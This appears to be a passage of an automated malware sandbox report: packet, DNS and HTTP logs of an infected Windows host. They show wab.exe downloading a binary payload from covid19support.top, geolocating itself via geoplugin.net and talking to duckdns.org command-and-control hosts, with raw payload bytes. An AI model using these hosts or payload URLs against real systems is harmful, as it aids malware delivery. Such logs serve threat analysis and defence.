                                                May 2, 2024 08:04:36.544889927 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.544902086 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.544924021 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.544939995 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.544939995 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.544971943 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.544984102 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.545008898 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.545008898 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.545084000 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.551997900 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.552011967 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.552045107 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.552076101 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.552078962 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.552109003 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.552119970 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.552138090 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.552161932 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.552211046 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.666187048 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.666208029 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.666326046 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.684792042 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.684875011 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.684889078 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.684890985 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.684926033 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.684952021 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.685002089 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.685061932 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.685075998 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.685081959 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.685098886 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.685131073 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.685152054 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.685180902 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.685189009 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.685260057 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.685302973 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.685337067 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.685368061 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.685408115 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.685432911 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.685446024 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.685503006 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.685522079 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.685623884 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.685642004 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.685672045 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:36.685691118 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:36.685746908 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:37.176223040 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:37.285100937 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:38.129273891 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:38.175688982 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.615797997 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.676009893 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.794063091 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.794126034 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.794136047 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.794162035 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.794296980 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.794413090 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.794447899 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.794542074 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.794615030 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.794646025 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.794791937 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.794924974 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.794955969 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.794981956 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.795037031 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.795069933 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.795116901 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.795188904 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.795202017 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.795229912 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.795232058 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.795258045 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.795316935 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.795363903 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.795376062 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.795393944 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.795429945 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.795443058 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.795454979 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.795465946 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.795469999 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.795476913 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.795494080 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.795530081 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.795536041 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.795547009 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.795578003 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.795591116 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.795628071 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.795659065 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.795690060 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.795701027 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.795712948 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.795731068 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.795785904 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.795811892 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.795819998 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.795880079 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.795891047 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.795902014 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.795907974 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.795926094 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.795948982 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.795959949 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.795973063 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.795996904 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.795996904 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.796026945 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.796061039 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.796072960 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.796083927 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.796108961 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.796113968 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.796123028 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.796144962 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.796153069 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.796160936 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.796178102 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.796217918 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.796252012 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.796261072 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.796310902 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.796324015 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.796340942 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.796365023 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.796375990 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.796396017 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.796400070 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.796412945 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.796428919 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.796451092 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.796463966 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.796474934 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.796492100 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.796494007 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.796515942 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.796518087 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.796540976 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.796581984 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.796595097 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.796606064 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.796621084 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.796644926 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.796657085 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.796675920 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.796680927 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.796686888 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.796705961 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.796772957 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.796803951 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.796828985 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.796859026 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.796885967 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.796892881 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.796928883 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.796962023 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.796991110 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.797046900 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.797065973 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.797081947 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.797106028 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.797116995 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.797133923 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.797157049 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.797175884 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.797183990 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.797193050 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.797219992 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.797245026 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.797266960 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.797286034 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.797302961 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.797327995 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.797359943 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.797374010 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.797415018 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.797435045 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.797455072 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.797458887 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.797481060 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.797499895 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.797502995 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.797523975 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.797544956 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.797549009 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.797578096 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.797585011 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.797616959 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.797646046 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.797652006 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.797691107 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.797724009 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.797724962 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.797779083 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.797791004 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.797805071 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.797818899 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.797822952 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.797841072 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.797846079 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.797867060 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.797875881 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.797899008 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.797924042 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.797931910 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.797969103 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.797986984 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.798002005 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.798031092 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.798048019 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.798065901 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.798095942 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.798115969 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.798136950 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.798142910 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.798165083 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.798182011 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.798185110 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.798244953 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.798257113 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.798285007 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.798290014 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.798301935 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:39.798319101 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.798336983 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:39.831010103 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:44.071980953 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:44.250179052 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:44.250200987 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:44.250211954 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:44.250221968 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:44.250391006 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:44.429178953 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:44.439743996 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:44.439790964 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:44.484936953 CEST4971629872192.168.2.5193.222.96.21
                                                May 2, 2024 08:04:44.665215969 CEST2987249716193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:59.854577065 CEST2987249715193.222.96.21192.168.2.5
                                                May 2, 2024 08:04:59.860795021 CEST4971529872192.168.2.5193.222.96.21
                                                May 2, 2024 08:05:00.081981897 CEST2987249715193.222.96.21192.168.2.5
                                                TimestampSource PortDest PortSource IPDest IP
                                                May 2, 2024 08:04:25.443058014 CEST6243753192.168.2.51.1.1.1
                                                May 2, 2024 08:04:25.537242889 CEST53624371.1.1.1192.168.2.5
                                                May 2, 2024 08:04:31.040555954 CEST6327753192.168.2.51.1.1.1
                                                May 2, 2024 08:04:31.144289017 CEST53632771.1.1.1192.168.2.5
                                                May 2, 2024 08:04:33.099962950 CEST6241753192.168.2.51.1.1.1
                                                May 2, 2024 08:04:33.203983068 CEST53624171.1.1.1192.168.2.5
                                                May 2, 2024 08:04:34.519339085 CEST6037053192.168.2.51.1.1.1
                                                May 2, 2024 08:04:34.608848095 CEST53603701.1.1.1192.168.2.5
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                May 2, 2024 08:04:25.443058014 CEST192.168.2.51.1.1.10x56b0Standard query (0)covid19support.topA (IP address)IN (0x0001)false
                                                May 2, 2024 08:04:31.040555954 CEST192.168.2.51.1.1.10xc61eStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                                May 2, 2024 08:04:33.099962950 CEST192.168.2.51.1.1.10x952fStandard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                                May 2, 2024 08:04:34.519339085 CEST192.168.2.51.1.1.10xd7c3Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                May 2, 2024 08:04:25.537242889 CEST1.1.1.1192.168.2.50x56b0No error (0)covid19support.top172.67.220.6A (IP address)IN (0x0001)false
                                                May 2, 2024 08:04:25.537242889 CEST1.1.1.1192.168.2.50x56b0No error (0)covid19support.top104.21.51.29A (IP address)IN (0x0001)false
                                                May 2, 2024 08:04:31.144289017 CEST1.1.1.1192.168.2.50xc61eNo error (0)learfo55ozj01.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                                May 2, 2024 08:04:33.203983068 CEST1.1.1.1192.168.2.50x952fNo error (0)learfo55ozj02.duckdns.org193.222.96.21A (IP address)IN (0x0001)false
                                                May 2, 2024 08:04:34.608848095 CEST1.1.1.1192.168.2.50xd7c3No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                • covid19support.top
                                                • geoplugin.net
                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.549717178.237.33.50803424C:\Program Files (x86)\Windows Mail\wab.exe
                                                TimestampBytes transferredDirectionData
                                                May 2, 2024 08:04:34.775507927 CEST71OUTGET /json.gp HTTP/1.1
                                                Host: geoplugin.net
                                                Cache-Control: no-cache
                                                May 2, 2024 08:04:34.946101904 CEST1173INHTTP/1.1 200 OK
                                                date: Thu, 02 May 2024 06:04:34 GMT
                                                server: Apache
                                                content-length: 965
                                                content-type: application/json; charset=utf-8
                                                cache-control: public, max-age=300
                                                access-control-allow-origin: *
                                                Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 [TRUNCATED]
                                                Data Ascii: { "geoplugin_request":"191.96.150.225", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.549712172.67.220.64433424C:\Program Files (x86)\Windows Mail\wab.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-02 06:04:25 UTC179OUTGET /OXdwhUAIa249.bin HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                Host: covid19support.top
                                                Cache-Control: no-cache
                                                2024-05-02 06:04:25 UTC850INHTTP/1.1 200 OK
                                                Date: Thu, 02 May 2024 06:04:25 GMT
                                                Content-Type: application/octet-stream
                                                Content-Length: 494656
                                                Connection: close
                                                Last-Modified: Sun, 28 Apr 2024 18:56:53 GMT
                                                ETag: "662e9bf5-78c40"
                                                Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                Cache-Control: max-age=315360000
                                                CF-Cache-Status: HIT
                                                Age: 259604
                                                Accept-Ranges: bytes
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y4%2Fj2WLcnpQAWFM1KtrWauHScWCrPAWSol23HXWa%2BHipTima%2FNVavmKo6AuM29qlBFSdLjdeoywOahg7ws6dDWPFnMhCAEmLglsYQnIs4BGk8FFhtm%2FKfB4XX2hjikYr8zMOeMc%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                X-Content-Type-Options: nosniff
                                                Server: cloudflare
                                                CF-RAY: 87d5d0560baa4394-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-05-02 06:04:25 UTC519INData Raw: 32 65 e7 c3 c1 ea 7d 23 b4 00 f3 2d bc f3 d6 dc 5d 0b ae 73 8e f2 59 c8 fa ed 55 d9 3b eb 19 aa b3 91 fb b3 40 46 f1 c6 91 78 9e d6 76 c9 04 ad e6 7f 74 df d0 83 91 bc e7 c0 b8 cb c0 ed da 6a 82 66 c8 a2 07 20 b8 c7 1a 2d 11 bc 05 3a 14 94 59 cc 56 09 2a 39 7d 50 e6 eb db 6f f2 92 8c 83 72 df 47 34 5f 05 22 d0 db 53 88 84 d6 53 40 1f 90 67 95 62 64 d5 85 c3 02 c8 46 ca 51 a3 5a fc d6 94 78 ec 85 7b c3 6d b5 7f 03 f3 b3 d3 02 5c 46 4d eb 46 90 60 79 8f fc b2 8f 6f 8f 7b 19 eb 9a d3 50 a8 15 e3 69 bb 7c f5 5f 4e 6d bb 61 be 52 6b 8d 21 db 16 19 0c 2b ea cb 4c 2d e7 39 d3 66 b2 56 2b a3 4f e1 96 ba 56 8d d0 cb b7 bb 14 db e1 16 c9 04 5b 10 6c 73 e5 0b 9b 56 1f 51 4d ff 58 3b 01 c5 fd b8 3a 6e eb 40 9e 39 8b 33 11 0c d4 37 0e c0 69 94 4d bd 09 1c 8d 10 d6 b1
                                                Data Ascii: 2e}#-]sYU;@Fxvtjf -:YV*9}PorG4_"SS@gbdFQZx{m\FMF`yo{Pi|_NmaRk!+L-9fV+OV[lsVQMX;:n@937iM
